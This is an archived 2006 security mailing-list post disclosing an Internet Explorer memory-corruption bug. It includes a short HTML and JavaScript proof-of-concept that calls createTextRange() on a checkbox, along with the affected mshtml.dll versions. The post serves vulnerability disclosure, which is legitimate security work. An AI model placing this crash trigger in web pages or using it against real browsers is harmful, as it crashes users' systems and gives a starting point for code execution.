lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44211537.1070306@gecadtech.com>
Date: Wed Mar 22 09:13:35 2006
From: stelian.ene at gecadtech.com (Stelian Ene)
Subject: IE crash

I can't find any info on this delicious IE bug, but it seems to be publicly known:

<input type="checkbox" id='c'>
<script>
	r=document.getElementById("c");
	a=r.createTextRange();
</script>

It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ